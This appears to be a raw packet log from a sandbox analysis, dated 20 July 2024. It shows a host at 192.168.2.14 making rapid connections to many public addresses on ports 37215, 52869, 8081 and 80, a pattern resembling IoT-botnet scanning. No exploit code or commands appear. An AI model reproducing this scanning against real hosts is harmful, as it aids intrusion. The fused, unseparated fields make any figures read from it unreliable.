                                                Jul 20, 2024 23:05:33.717353106 CEST4930852869192.168.2.1481.167.63.48
                                                Jul 20, 2024 23:05:33.717627048 CEST396128081192.168.2.14175.213.86.159
                                                Jul 20, 2024 23:05:33.717683077 CEST804750095.191.67.246192.168.2.14
                                                Jul 20, 2024 23:05:33.717734098 CEST5286943194142.219.250.29192.168.2.14
                                                Jul 20, 2024 23:05:33.717781067 CEST4750080192.168.2.1495.191.67.246
                                                Jul 20, 2024 23:05:33.717783928 CEST4319452869192.168.2.14142.219.250.29
                                                Jul 20, 2024 23:05:33.718044996 CEST808134406206.200.85.218192.168.2.14
                                                Jul 20, 2024 23:05:33.718097925 CEST344068081192.168.2.14206.200.85.218
                                                Jul 20, 2024 23:05:33.719082117 CEST4936237215192.168.2.14185.101.34.75
                                                Jul 20, 2024 23:05:33.719275951 CEST4204280192.168.2.1495.122.145.119
                                                Jul 20, 2024 23:05:33.719275951 CEST4204280192.168.2.1495.122.145.119
                                                Jul 20, 2024 23:05:33.719605923 CEST805888895.164.165.175192.168.2.14
                                                Jul 20, 2024 23:05:33.720860958 CEST3721538480197.148.145.109192.168.2.14
                                                Jul 20, 2024 23:05:33.720942020 CEST3848037215192.168.2.14197.148.145.109
                                                Jul 20, 2024 23:05:33.720949888 CEST80815077489.204.254.142192.168.2.14
                                                Jul 20, 2024 23:05:33.720963001 CEST804655695.106.187.139192.168.2.14
                                                Jul 20, 2024 23:05:33.720967054 CEST80813443680.161.237.245192.168.2.14
                                                Jul 20, 2024 23:05:33.721002102 CEST804869295.171.109.242192.168.2.14
                                                Jul 20, 2024 23:05:33.721005917 CEST5060052869192.168.2.14131.84.155.33
                                                Jul 20, 2024 23:05:33.721254110 CEST596788081192.168.2.14218.176.173.120
                                                Jul 20, 2024 23:05:33.721849918 CEST4248280192.168.2.1495.122.145.119
                                                Jul 20, 2024 23:05:33.722054005 CEST805932495.164.165.175192.168.2.14
                                                Jul 20, 2024 23:05:33.722388983 CEST5932480192.168.2.1495.164.165.175
                                                Jul 20, 2024 23:05:33.722992897 CEST528694930881.167.63.48192.168.2.14
                                                Jul 20, 2024 23:05:33.723042011 CEST4930852869192.168.2.1481.167.63.48
                                                Jul 20, 2024 23:05:33.723118067 CEST808139612175.213.86.159192.168.2.14
                                                Jul 20, 2024 23:05:33.723306894 CEST396128081192.168.2.14175.213.86.159
                                                Jul 20, 2024 23:05:33.724088907 CEST4039637215192.168.2.14174.135.199.129
                                                Jul 20, 2024 23:05:33.724503040 CEST4713280192.168.2.1495.219.116.49
                                                Jul 20, 2024 23:05:33.724503040 CEST4713280192.168.2.1495.219.116.49
                                                Jul 20, 2024 23:05:33.725060940 CEST3721549362185.101.34.75192.168.2.14
                                                Jul 20, 2024 23:05:33.725066900 CEST804204295.122.145.119192.168.2.14
                                                Jul 20, 2024 23:05:33.725095987 CEST4936237215192.168.2.14185.101.34.75
                                                Jul 20, 2024 23:05:33.725946903 CEST5286950600131.84.155.33192.168.2.14
                                                Jul 20, 2024 23:05:33.725996971 CEST5060052869192.168.2.14131.84.155.33
                                                Jul 20, 2024 23:05:33.726084948 CEST4050652869192.168.2.1495.188.72.113
                                                Jul 20, 2024 23:05:33.726414919 CEST576408081192.168.2.14216.94.19.185
                                                Jul 20, 2024 23:05:33.726490974 CEST808159678218.176.173.120192.168.2.14
                                                Jul 20, 2024 23:05:33.726577997 CEST596788081192.168.2.14218.176.173.120
                                                Jul 20, 2024 23:05:33.726624966 CEST804248295.122.145.119192.168.2.14
                                                Jul 20, 2024 23:05:33.726726055 CEST4248280192.168.2.1495.122.145.119
                                                Jul 20, 2024 23:05:33.727054119 CEST4757480192.168.2.1495.219.116.49
                                                Jul 20, 2024 23:05:33.729536057 CEST3584637215192.168.2.14204.22.161.228
                                                Jul 20, 2024 23:05:33.729713917 CEST808134480125.204.49.213192.168.2.14
                                                Jul 20, 2024 23:05:33.729718924 CEST805471895.50.236.32192.168.2.14
                                                Jul 20, 2024 23:05:33.729723930 CEST3721540396174.135.199.129192.168.2.14
                                                Jul 20, 2024 23:05:33.729734898 CEST804713295.219.116.49192.168.2.14
                                                Jul 20, 2024 23:05:33.729772091 CEST4039637215192.168.2.14174.135.199.129
                                                Jul 20, 2024 23:05:33.730259895 CEST5023852869192.168.2.1414.214.68.156
                                                Jul 20, 2024 23:05:33.730555058 CEST374568081192.168.2.14165.244.247.227
                                                Jul 20, 2024 23:05:33.730994940 CEST528694050695.188.72.113192.168.2.14
                                                Jul 20, 2024 23:05:33.731070995 CEST5012480192.168.2.1495.88.159.153
                                                Jul 20, 2024 23:05:33.731070995 CEST5012480192.168.2.1495.88.159.153
                                                Jul 20, 2024 23:05:33.731107950 CEST4050652869192.168.2.1495.188.72.113
                                                Jul 20, 2024 23:05:33.732872963 CEST808157640216.94.19.185192.168.2.14
                                                Jul 20, 2024 23:05:33.732943058 CEST804757495.219.116.49192.168.2.14
                                                Jul 20, 2024 23:05:33.733021975 CEST576408081192.168.2.14216.94.19.185
                                                Jul 20, 2024 23:05:33.733047009 CEST4757480192.168.2.1495.219.116.49
                                                Jul 20, 2024 23:05:33.733289957 CEST804492695.187.58.238192.168.2.14
                                                Jul 20, 2024 23:05:33.733349085 CEST3952237215192.168.2.14157.129.24.89
                                                Jul 20, 2024 23:05:33.733578920 CEST5056880192.168.2.1495.88.159.153
                                                Jul 20, 2024 23:05:33.734414101 CEST3721535846204.22.161.228192.168.2.14
                                                Jul 20, 2024 23:05:33.734483004 CEST3584637215192.168.2.14204.22.161.228
                                                Jul 20, 2024 23:05:33.734983921 CEST4323252869192.168.2.1436.164.151.170
                                                Jul 20, 2024 23:05:33.735431910 CEST343348081192.168.2.1452.244.143.64
                                                Jul 20, 2024 23:05:33.735511065 CEST528695023814.214.68.156192.168.2.14
                                                Jul 20, 2024 23:05:33.735593081 CEST5023852869192.168.2.1414.214.68.156
                                                Jul 20, 2024 23:05:33.735780001 CEST808137456165.244.247.227192.168.2.14
                                                Jul 20, 2024 23:05:33.735847950 CEST805012495.88.159.153192.168.2.14
                                                Jul 20, 2024 23:05:33.735882044 CEST374568081192.168.2.14165.244.247.227
                                                Jul 20, 2024 23:05:33.736052990 CEST4153680192.168.2.1495.255.231.56
                                                Jul 20, 2024 23:05:33.736052990 CEST4153680192.168.2.1495.255.231.56
                                                Jul 20, 2024 23:05:33.738188982 CEST3285037215192.168.2.14157.183.228.205
                                                Jul 20, 2024 23:05:33.738300085 CEST3721539522157.129.24.89192.168.2.14
                                                Jul 20, 2024 23:05:33.738344908 CEST3952237215192.168.2.14157.129.24.89
                                                Jul 20, 2024 23:05:33.738538027 CEST4198080192.168.2.1495.255.231.56
                                                Jul 20, 2024 23:05:33.738976955 CEST805056895.88.159.153192.168.2.14
                                                Jul 20, 2024 23:05:33.739051104 CEST5056880192.168.2.1495.88.159.153
                                                Jul 20, 2024 23:05:33.739862919 CEST528694323236.164.151.170192.168.2.14
                                                Jul 20, 2024 23:05:33.739918947 CEST4323252869192.168.2.1436.164.151.170
                                                Jul 20, 2024 23:05:33.740118027 CEST3615252869192.168.2.14203.171.109.95
                                                Jul 20, 2024 23:05:33.740298986 CEST80813433452.244.143.64192.168.2.14
                                                Jul 20, 2024 23:05:33.740350008 CEST343348081192.168.2.1452.244.143.64
                                                Jul 20, 2024 23:05:33.740493059 CEST504408081192.168.2.14194.241.217.231
                                                Jul 20, 2024 23:05:33.740797997 CEST804153695.255.231.56192.168.2.14
                                                Jul 20, 2024 23:05:33.741159916 CEST5700280192.168.2.1495.81.227.113
                                                Jul 20, 2024 23:05:33.741159916 CEST5700280192.168.2.1495.81.227.113
                                                Jul 20, 2024 23:05:33.742290020 CEST5698037215192.168.2.14157.76.189.3
                                                Jul 20, 2024 23:05:33.743419886 CEST3721532850157.183.228.205192.168.2.14
                                                Jul 20, 2024 23:05:33.743505955 CEST3285037215192.168.2.14157.183.228.205
                                                Jul 20, 2024 23:05:33.743855000 CEST5744680192.168.2.1495.81.227.113
                                                Jul 20, 2024 23:05:33.743863106 CEST804198095.255.231.56192.168.2.14
                                                Jul 20, 2024 23:05:33.743912935 CEST4198080192.168.2.1495.255.231.56
                                                Jul 20, 2024 23:05:33.744215965 CEST4850452869192.168.2.14125.97.107.120
                                                Jul 20, 2024 23:05:33.744971991 CEST5286936152203.171.109.95192.168.2.14
                                                Jul 20, 2024 23:05:33.745074987 CEST3615252869192.168.2.14203.171.109.95
                                                Jul 20, 2024 23:05:33.745462894 CEST808150440194.241.217.231192.168.2.14
                                                Jul 20, 2024 23:05:33.745528936 CEST504408081192.168.2.14194.241.217.231
                                                Jul 20, 2024 23:05:33.745949030 CEST586528081192.168.2.14124.192.22.110
                                                Jul 20, 2024 23:05:33.746160030 CEST805700295.81.227.113192.168.2.14
                                                Jul 20, 2024 23:05:33.746531963 CEST3795080192.168.2.1495.159.5.85
                                                Jul 20, 2024 23:05:33.746531963 CEST3795080192.168.2.1495.159.5.85
                                                Jul 20, 2024 23:05:33.747205973 CEST3721556980157.76.189.3192.168.2.14
                                                Jul 20, 2024 23:05:33.747278929 CEST5698037215192.168.2.14157.76.189.3
                                                Jul 20, 2024 23:05:33.747536898 CEST5930637215192.168.2.14157.155.124.136
                                                Jul 20, 2024 23:05:33.748678923 CEST805744695.81.227.113192.168.2.14
                                                Jul 20, 2024 23:05:33.748763084 CEST5744680192.168.2.1495.81.227.113
                                                Jul 20, 2024 23:05:33.748991013 CEST3839480192.168.2.1495.159.5.85
                                                Jul 20, 2024 23:05:33.749126911 CEST8081430904.188.104.13192.168.2.14
                                                Jul 20, 2024 23:05:33.749138117 CEST5286948504125.97.107.120192.168.2.14
                                                Jul 20, 2024 23:05:33.749248028 CEST4850452869192.168.2.14125.97.107.120
                                                Jul 20, 2024 23:05:33.749455929 CEST4683652869192.168.2.14216.17.47.144
                                                Jul 20, 2024 23:05:33.751053095 CEST420148081192.168.2.14134.119.253.236
                                                Jul 20, 2024 23:05:33.751087904 CEST808158652124.192.22.110192.168.2.14
                                                Jul 20, 2024 23:05:33.751283884 CEST586528081192.168.2.14124.192.22.110
                                                Jul 20, 2024 23:05:33.751323938 CEST803795095.159.5.85192.168.2.14
                                                Jul 20, 2024 23:05:33.751602888 CEST4330080192.168.2.1495.183.13.8
                                                Jul 20, 2024 23:05:33.751602888 CEST4330080192.168.2.1495.183.13.8
                                                Jul 20, 2024 23:05:33.752368927 CEST5997637215192.168.2.14121.209.116.212
                                                Jul 20, 2024 23:05:33.752470970 CEST3721559306157.155.124.136192.168.2.14
                                                Jul 20, 2024 23:05:33.752516031 CEST5930637215192.168.2.14157.155.124.136
                                                Jul 20, 2024 23:05:33.753844976 CEST4374680192.168.2.1495.183.13.8
                                                Jul 20, 2024 23:05:33.754055977 CEST3758452869192.168.2.14150.186.198.246
                                                Jul 20, 2024 23:05:33.754220963 CEST803839495.159.5.85192.168.2.14
                                                Jul 20, 2024 23:05:33.754304886 CEST3839480192.168.2.1495.159.5.85
                                                Jul 20, 2024 23:05:33.754694939 CEST5286946836216.17.47.144192.168.2.14
                                                Jul 20, 2024 23:05:33.754733086 CEST4683652869192.168.2.14216.17.47.144
                                                Jul 20, 2024 23:05:33.755923986 CEST585308081192.168.2.1462.126.175.165
                                                Jul 20, 2024 23:05:33.755990982 CEST808142014134.119.253.236192.168.2.14
                                                Jul 20, 2024 23:05:33.756130934 CEST420148081192.168.2.14134.119.253.236
                                                Jul 20, 2024 23:05:33.756155968 CEST4332037215192.168.2.14197.220.34.254
                                                Jul 20, 2024 23:05:33.756510019 CEST6079280192.168.2.1495.224.183.85
                                                Jul 20, 2024 23:05:33.756510019 CEST6079280192.168.2.1495.224.183.85
                                                Jul 20, 2024 23:05:33.756628990 CEST804330095.183.13.8192.168.2.14
                                                Jul 20, 2024 23:05:33.756937027 CEST803611695.234.250.137192.168.2.14
                                                Jul 20, 2024 23:05:33.756943941 CEST80815727887.232.28.113192.168.2.14
                                                Jul 20, 2024 23:05:33.756947994 CEST804706695.191.67.246192.168.2.14
                                                Jul 20, 2024 23:05:33.757174015 CEST3721559976121.209.116.212192.168.2.14
                                                Jul 20, 2024 23:05:33.757230043 CEST5997637215192.168.2.14121.209.116.212
                                                Jul 20, 2024 23:05:33.760202885 CEST804374695.183.13.8192.168.2.14
                                                Jul 20, 2024 23:05:33.760207891 CEST5286937584150.186.198.246192.168.2.14
                                                Jul 20, 2024 23:05:33.760226965 CEST3300680192.168.2.1495.224.183.85
                                                Jul 20, 2024 23:05:33.760247946 CEST4374680192.168.2.1495.183.13.8
                                                Jul 20, 2024 23:05:33.760282040 CEST3758452869192.168.2.14150.186.198.246
                                                Jul 20, 2024 23:05:33.760560989 CEST5263052869192.168.2.14187.140.68.61
                                                Jul 20, 2024 23:05:33.761898041 CEST80815853062.126.175.165192.168.2.14
                                                Jul 20, 2024 23:05:33.761913061 CEST3721543320197.220.34.254192.168.2.14
                                                Jul 20, 2024 23:05:33.761957884 CEST806079295.224.183.85192.168.2.14
                                                Jul 20, 2024 23:05:33.761966944 CEST585308081192.168.2.1462.126.175.165
                                                Jul 20, 2024 23:05:33.761969090 CEST4332037215192.168.2.14197.220.34.254
                                                Jul 20, 2024 23:05:33.762525082 CEST543708081192.168.2.14198.22.36.136
                                                Jul 20, 2024 23:05:33.762804985 CEST5727437215192.168.2.1492.57.180.103
                                                Jul 20, 2024 23:05:33.762923956 CEST3431680192.168.2.1495.63.149.249
                                                Jul 20, 2024 23:05:33.762923956 CEST3431680192.168.2.1495.63.149.249
                                                Jul 20, 2024 23:05:33.765647888 CEST805888895.164.165.175192.168.2.14
                                                Jul 20, 2024 23:05:33.765707970 CEST803300695.224.183.85192.168.2.14
                                                Jul 20, 2024 23:05:33.765765905 CEST5286952630187.140.68.61192.168.2.14
                                                Jul 20, 2024 23:05:33.765786886 CEST3300680192.168.2.1495.224.183.85
                                                Jul 20, 2024 23:05:33.765855074 CEST5263052869192.168.2.14187.140.68.61
                                                Jul 20, 2024 23:05:33.765945911 CEST4530652869192.168.2.14153.126.184.30
                                                Jul 20, 2024 23:05:33.767805099 CEST3476880192.168.2.1495.63.149.249
                                                Jul 20, 2024 23:05:33.770528078 CEST804204295.122.145.119192.168.2.14
                                                Jul 20, 2024 23:05:33.770904064 CEST396268081192.168.2.1486.35.5.8
                                                Jul 20, 2024 23:05:33.770950079 CEST808154370198.22.36.136192.168.2.14
                                                Jul 20, 2024 23:05:33.770956039 CEST372155727492.57.180.103192.168.2.14
                                                Jul 20, 2024 23:05:33.770960093 CEST803431695.63.149.249192.168.2.14
                                                Jul 20, 2024 23:05:33.770968914 CEST5286945306153.126.184.30192.168.2.14
                                                Jul 20, 2024 23:05:33.771014929 CEST543708081192.168.2.14198.22.36.136
                                                Jul 20, 2024 23:05:33.771014929 CEST5727437215192.168.2.1492.57.180.103
                                                Jul 20, 2024 23:05:33.771060944 CEST4530652869192.168.2.14153.126.184.30
                                                Jul 20, 2024 23:05:33.771286964 CEST5336437215192.168.2.1441.142.55.170
                                                Jul 20, 2024 23:05:33.771676064 CEST3969480192.168.2.1495.67.19.107
                                                Jul 20, 2024 23:05:33.771676064 CEST3969480192.168.2.1495.67.19.107
                                                Jul 20, 2024 23:05:33.773263931 CEST4578052869192.168.2.1451.55.196.22
                                                Jul 20, 2024 23:05:33.773390055 CEST803476895.63.149.249192.168.2.14
                                                Jul 20, 2024 23:05:33.773435116 CEST3476880192.168.2.1495.63.149.249
                                                Jul 20, 2024 23:05:33.774180889 CEST4014680192.168.2.1495.67.19.107
                                                Jul 20, 2024 23:05:33.775099993 CEST365948081192.168.2.1417.7.135.117
                                                Jul 20, 2024 23:05:33.775578976 CEST5249437215192.168.2.14216.204.37.61
                                                Jul 20, 2024 23:05:33.775794029 CEST80813962686.35.5.8192.168.2.14
                                                Jul 20, 2024 23:05:33.775842905 CEST396268081192.168.2.1486.35.5.8
                                                Jul 20, 2024 23:05:33.776269913 CEST372155336441.142.55.170192.168.2.14
                                                Jul 20, 2024 23:05:33.776341915 CEST5336437215192.168.2.1441.142.55.170
                                                Jul 20, 2024 23:05:33.776508093 CEST803969495.67.19.107192.168.2.14
                                                Jul 20, 2024 23:05:33.776949883 CEST804713295.219.116.49192.168.2.14
                                                Jul 20, 2024 23:05:33.777093887 CEST3356880192.168.2.1495.101.7.150
                                                Jul 20, 2024 23:05:33.777093887 CEST3356880192.168.2.1495.101.7.150
                                                Jul 20, 2024 23:05:33.777527094 CEST4114852869192.168.2.14107.226.165.86
                                                Jul 20, 2024 23:05:33.778379917 CEST528694578051.55.196.22192.168.2.14
                                                Jul 20, 2024 23:05:33.778533936 CEST4578052869192.168.2.1451.55.196.22
                                                Jul 20, 2024 23:05:33.779186010 CEST804014695.67.19.107192.168.2.14
                                                Jul 20, 2024 23:05:33.779252052 CEST4014680192.168.2.1495.67.19.107
                                                Jul 20, 2024 23:05:33.779563904 CEST3402280192.168.2.1495.101.7.150
                                                Jul 20, 2024 23:05:33.780118942 CEST597628081192.168.2.1485.73.99.232
                                                Jul 20, 2024 23:05:33.780364990 CEST3637437215192.168.2.14197.48.219.131
                                                Jul 20, 2024 23:05:33.781620026 CEST805012495.88.159.153192.168.2.14
                                                Jul 20, 2024 23:05:33.781861067 CEST80813659417.7.135.117192.168.2.14
                                                Jul 20, 2024 23:05:33.781919003 CEST365948081192.168.2.1417.7.135.117
                                                Jul 20, 2024 23:05:33.782102108 CEST3721552494216.204.37.61192.168.2.14
                                                Jul 20, 2024 23:05:33.782200098 CEST5249437215192.168.2.14216.204.37.61
                                                Jul 20, 2024 23:05:33.782339096 CEST5271080192.168.2.1495.214.176.104
                                                Jul 20, 2024 23:05:33.782339096 CEST5271080192.168.2.1495.214.176.104
                                                Jul 20, 2024 23:05:33.782416105 CEST803356895.101.7.150192.168.2.14
                                                Jul 20, 2024 23:05:33.782573938 CEST4116252869192.168.2.14205.9.202.98
                                                Jul 20, 2024 23:05:33.783449888 CEST5286941148107.226.165.86192.168.2.14
                                                Jul 20, 2024 23:05:33.783498049 CEST4114852869192.168.2.14107.226.165.86
                                                Jul 20, 2024 23:05:33.784285069 CEST472868081192.168.2.14151.153.104.167
                                                Jul 20, 2024 23:05:33.784518957 CEST3537637215192.168.2.14189.228.237.19
                                                Jul 20, 2024 23:05:33.784611940 CEST5316880192.168.2.1495.214.176.104
                                                Jul 20, 2024 23:05:33.785413027 CEST804153695.255.231.56192.168.2.14
                                                Jul 20, 2024 23:05:33.785420895 CEST803402295.101.7.150192.168.2.14
                                                Jul 20, 2024 23:05:33.785461903 CEST80815976285.73.99.232192.168.2.14
                                                Jul 20, 2024 23:05:33.785496950 CEST3402280192.168.2.1495.101.7.150
                                                Jul 20, 2024 23:05:33.785514116 CEST597628081192.168.2.1485.73.99.232
                                                Jul 20, 2024 23:05:33.785927057 CEST3721536374197.48.219.131192.168.2.14
                                                Jul 20, 2024 23:05:33.786030054 CEST3637437215192.168.2.14197.48.219.131
                                                Jul 20, 2024 23:05:33.786745071 CEST4948052869192.168.2.14175.91.47.151
                                                Jul 20, 2024 23:05:33.787734985 CEST5651880192.168.2.1495.216.245.126
                                                Jul 20, 2024 23:05:33.787734985 CEST5651880192.168.2.1495.216.245.126
                                                Jul 20, 2024 23:05:33.788429976 CEST805271095.214.176.104192.168.2.14
                                                Jul 20, 2024 23:05:33.788434982 CEST5286941162205.9.202.98192.168.2.14
                                                Jul 20, 2024 23:05:33.788506031 CEST4116252869192.168.2.14205.9.202.98
                                                Jul 20, 2024 23:05:33.789267063 CEST805700295.81.227.113192.168.2.14
                                                Jul 20, 2024 23:05:33.789951086 CEST451108081192.168.2.14213.31.81.52
                                                Jul 20, 2024 23:05:33.790357113 CEST3829637215192.168.2.14157.170.165.170
                                                Jul 20, 2024 23:05:33.790414095 CEST808147286151.153.104.167192.168.2.14
                                                Jul 20, 2024 23:05:33.790419102 CEST3721535376189.228.237.19192.168.2.14
                                                Jul 20, 2024 23:05:33.790481091 CEST5697680192.168.2.1495.216.245.126
                                                Jul 20, 2024 23:05:33.790482998 CEST472868081192.168.2.14151.153.104.167
                                                Jul 20, 2024 23:05:33.790493965 CEST3537637215192.168.2.14189.228.237.19
                                                Jul 20, 2024 23:05:33.790513039 CEST805316895.214.176.104192.168.2.14
                                                Jul 20, 2024 23:05:33.790556908 CEST5316880192.168.2.1495.214.176.104
                                                Jul 20, 2024 23:05:33.792051077 CEST5691452869192.168.2.145.221.237.47
                                                Jul 20, 2024 23:05:33.792437077 CEST5286949480175.91.47.151192.168.2.14
                                                Jul 20, 2024 23:05:33.792526007 CEST4948052869192.168.2.14175.91.47.151
                                                Jul 20, 2024 23:05:33.793143034 CEST4092680192.168.2.14112.91.135.215
                                                Jul 20, 2024 23:05:33.793143034 CEST4092680192.168.2.14112.91.135.215
                                                Jul 20, 2024 23:05:33.793523073 CEST803795095.159.5.85192.168.2.14
                                                Jul 20, 2024 23:05:33.793613911 CEST805651895.216.245.126192.168.2.14
                                                Jul 20, 2024 23:05:33.795311928 CEST567688081192.168.2.14196.214.28.4
                                                Jul 20, 2024 23:05:33.795562029 CEST808145110213.31.81.52192.168.2.14
                                                Jul 20, 2024 23:05:33.795732975 CEST451108081192.168.2.14213.31.81.52
                                                Jul 20, 2024 23:05:33.795736074 CEST4700237215192.168.2.14197.178.185.152
                                                Jul 20, 2024 23:05:33.795969963 CEST4138480192.168.2.14112.91.135.215
                                                Jul 20, 2024 23:05:33.796093941 CEST3721538296157.170.165.170192.168.2.14
                                                Jul 20, 2024 23:05:33.796175957 CEST3829637215192.168.2.14157.170.165.170
                                                Jul 20, 2024 23:05:33.796423912 CEST4497252869192.168.2.14134.226.59.80
                                                Jul 20, 2024 23:05:33.796677113 CEST805697695.216.245.126192.168.2.14
                                                Jul 20, 2024 23:05:33.796782017 CEST5697680192.168.2.1495.216.245.126
                                                Jul 20, 2024 23:05:33.796853065 CEST52869569145.221.237.47192.168.2.14
                                                Jul 20, 2024 23:05:33.796999931 CEST5691452869192.168.2.145.221.237.47
                                                Jul 20, 2024 23:05:33.797207117 CEST804330095.183.13.8192.168.2.14
                                                Jul 20, 2024 23:05:33.798043966 CEST8040926112.91.135.215192.168.2.14
                                                Jul 20, 2024 23:05:33.798641920 CEST5449480192.168.2.1495.17.124.99
                                                Jul 20, 2024 23:05:33.798641920 CEST3508280192.168.2.1495.59.134.24
                                                Jul 20, 2024 23:05:33.798641920 CEST3762080192.168.2.1495.61.168.150
                                                Jul 20, 2024 23:05:33.798671007 CEST4617680192.168.2.1495.236.83.119
                                                Jul 20, 2024 23:05:33.798671007 CEST5537880192.168.2.1495.85.128.197
                                                Jul 20, 2024 23:05:33.798681021 CEST3956280192.168.2.1495.220.228.215
                                                Jul 20, 2024 23:05:33.798681021 CEST5243680192.168.2.1495.104.136.90
                                                Jul 20, 2024 23:05:33.798789024 CEST5611680192.168.2.1495.55.62.244
                                                Jul 20, 2024 23:05:33.798791885 CEST5662080192.168.2.1495.100.201.122
                                                Jul 20, 2024 23:05:33.798791885 CEST3834480192.168.2.1495.115.64.83
                                                Jul 20, 2024 23:05:33.798791885 CEST5730880192.168.2.1495.57.115.181
                                                Jul 20, 2024 23:05:33.798795938 CEST5681480192.168.2.1495.213.60.63
                                                Jul 20, 2024 23:05:33.798795938 CEST4431080192.168.2.1495.59.184.231
                                                Jul 20, 2024 23:05:33.798810005 CEST3805080192.168.2.1495.119.118.209
                                                Jul 20, 2024 23:05:33.798810005 CEST3826280192.168.2.1495.189.164.11
                                                Jul 20, 2024 23:05:33.798810005 CEST5699480192.168.2.1495.139.191.115
                                                Jul 20, 2024 23:05:33.798903942 CEST3976280192.168.2.1495.36.201.87
                                                Jul 20, 2024 23:05:33.798903942 CEST5830880192.168.2.1495.136.249.39
                                                Jul 20, 2024 23:05:33.798903942 CEST6068480192.168.2.1495.211.239.130
                                                Jul 20, 2024 23:05:33.798906088 CEST4393680192.168.2.1495.232.173.19
                                                Jul 20, 2024 23:05:33.798906088 CEST4784280192.168.2.1495.182.35.196
                                                Jul 20, 2024 23:05:33.798906088 CEST5760480192.168.2.1495.7.161.207
                                                Jul 20, 2024 23:05:33.798948050 CEST5211480192.168.2.1495.57.6.186
                                                Jul 20, 2024 23:05:33.798948050 CEST4078680192.168.2.1495.41.85.63
                                                Jul 20, 2024 23:05:33.798948050 CEST4086680192.168.2.1495.62.179.67
                                                Jul 20, 2024 23:05:33.798948050 CEST3504280192.168.2.1495.156.74.111
                                                Jul 20, 2024 23:05:33.798948050 CEST5825880192.168.2.1495.158.80.43
                                                Jul 20, 2024 23:05:33.799007893 CEST5725080192.168.2.1495.237.41.55
                                                Jul 20, 2024 23:05:33.799009085 CEST3812680192.168.2.1495.246.233.118
                                                Jul 20, 2024 23:05:33.799009085 CEST4757480192.168.2.1495.219.116.49
                                                Jul 20, 2024 23:05:33.799009085 CEST4198080192.168.2.1495.255.231.56
                                                Jul 20, 2024 23:05:33.799009085 CEST4374680192.168.2.1495.183.13.8
                                                Jul 20, 2024 23:05:33.799288988 CEST4749080192.168.2.1495.31.158.7
                                                Jul 20, 2024 23:05:33.799288988 CEST5520280192.168.2.1495.77.250.166
                                                Jul 20, 2024 23:05:33.799288988 CEST4698680192.168.2.1495.106.187.139
                                                Jul 20, 2024 23:05:33.799288988 CEST3402280192.168.2.1495.101.7.150
                                                Jul 20, 2024 23:05:33.799437046 CEST3969880192.168.2.1495.121.142.215
                                                Jul 20, 2024 23:05:33.799437046 CEST5107880192.168.2.1495.207.149.105
                                                Jul 20, 2024 23:05:33.799437046 CEST4535880192.168.2.1495.187.58.238
                                                Jul 20, 2024 23:05:33.799437046 CEST5316880192.168.2.1495.214.176.104
                                                Jul 20, 2024 23:05:33.799437046 CEST2747880192.168.2.14112.36.220.195
                                                Jul 20, 2024 23:05:33.799437046 CEST2747880192.168.2.14112.32.3.3
                                                Jul 20, 2024 23:05:33.799437046 CEST2747880192.168.2.14112.143.130.83
                                                Jul 20, 2024 23:05:33.799437046 CEST2747880192.168.2.14112.251.132.95
                                                Jul 20, 2024 23:05:33.799535990 CEST3954080192.168.2.1495.243.3.180
                                                Jul 20, 2024 23:05:33.799536943 CEST3610480192.168.2.1495.220.243.61
                                                Jul 20, 2024 23:05:33.799536943 CEST4912480192.168.2.1495.171.109.242
                                                Jul 20, 2024 23:05:33.799536943 CEST3839480192.168.2.1495.159.5.85
                                                Jul 20, 2024 23:05:33.799536943 CEST2747880192.168.2.14112.236.220.141
                                                Jul 20, 2024 23:05:33.799536943 CEST2747880192.168.2.14112.4.253.137
                                                Jul 20, 2024 23:05:33.799536943 CEST2747880192.168.2.14112.9.184.223
                                                Jul 20, 2024 23:05:33.799895048 CEST4282680192.168.2.1495.75.247.171
                                                Jul 20, 2024 23:05:33.799895048 CEST4204480192.168.2.1495.12.251.221
                                                Jul 20, 2024 23:05:33.799895048 CEST2747880192.168.2.14112.3.253.1
                                                Jul 20, 2024 23:05:33.799895048 CEST2747880192.168.2.14112.92.174.107
                                                Jul 20, 2024 23:05:33.799895048 CEST2747880192.168.2.14112.34.176.241
                                                Jul 20, 2024 23:05:33.799895048 CEST2747880192.168.2.14112.138.228.22
                                                Jul 20, 2024 23:05:33.799895048 CEST2747880192.168.2.14112.156.142.30
                                                Jul 20, 2024 23:05:33.799994946 CEST3476880192.168.2.1495.63.149.249
                                                Jul 20, 2024 23:05:33.799994946 CEST4014680192.168.2.1495.67.19.107
                                                Jul 20, 2024 23:05:33.799994946 CEST2747880192.168.2.14112.134.182.255
                                                Jul 20, 2024 23:05:33.799994946 CEST2747880192.168.2.14112.175.130.75
                                                Jul 20, 2024 23:05:33.799994946 CEST2747880192.168.2.14112.101.41.231
                                                Jul 20, 2024 23:05:33.799994946 CEST2747880192.168.2.14112.190.49.254
                                                Jul 20, 2024 23:05:33.799994946 CEST2747880192.168.2.14112.205.151.30
                                                Jul 20, 2024 23:05:33.799994946 CEST2747880192.168.2.14112.29.219.77
                                                Jul 20, 2024 23:05:33.800100088 CEST2747880192.168.2.14112.157.87.162
                                                Jul 20, 2024 23:05:33.800100088 CEST2747880192.168.2.14112.127.110.129
                                                Jul 20, 2024 23:05:33.800100088 CEST2747880192.168.2.14112.165.112.253
                                                Jul 20, 2024 23:05:33.800100088 CEST2747880192.168.2.14112.210.253.203
                                                Jul 20, 2024 23:05:33.800100088 CEST2747880192.168.2.14112.202.133.26
                                                Jul 20, 2024 23:05:33.800101042 CEST2747880192.168.2.14112.214.234.241
                                                Jul 20, 2024 23:05:33.800101042 CEST2747880192.168.2.14112.58.180.141
                                                Jul 20, 2024 23:05:33.800101042 CEST2747880192.168.2.14112.26.197.120
                                                Jul 20, 2024 23:05:33.800307035 CEST808156768196.214.28.4192.168.2.14
                                                Jul 20, 2024 23:05:33.800702095 CEST4750080192.168.2.1495.191.67.246
                                                Jul 20, 2024 23:05:33.800702095 CEST5744680192.168.2.1495.81.227.113
                                                Jul 20, 2024 23:05:33.800702095 CEST2747880192.168.2.14112.120.24.114
                                                Jul 20, 2024 23:05:33.800702095 CEST2747880192.168.2.14112.112.0.82
                                                Jul 20, 2024 23:05:33.800702095 CEST2747880192.168.2.14112.59.68.15
                                                Jul 20, 2024 23:05:33.800702095 CEST2747880192.168.2.14112.52.38.59
                                                Jul 20, 2024 23:05:33.800702095 CEST2747880192.168.2.14112.246.238.137
                                                Jul 20, 2024 23:05:33.800702095 CEST2747880192.168.2.14112.157.148.140
                                                Jul 20, 2024 23:05:33.800744057 CEST3721547002197.178.185.152192.168.2.14
                                                Jul 20, 2024 23:05:33.801153898 CEST2747880192.168.2.14112.120.190.128
                                                Jul 20, 2024 23:05:33.801153898 CEST2747880192.168.2.14112.65.134.11
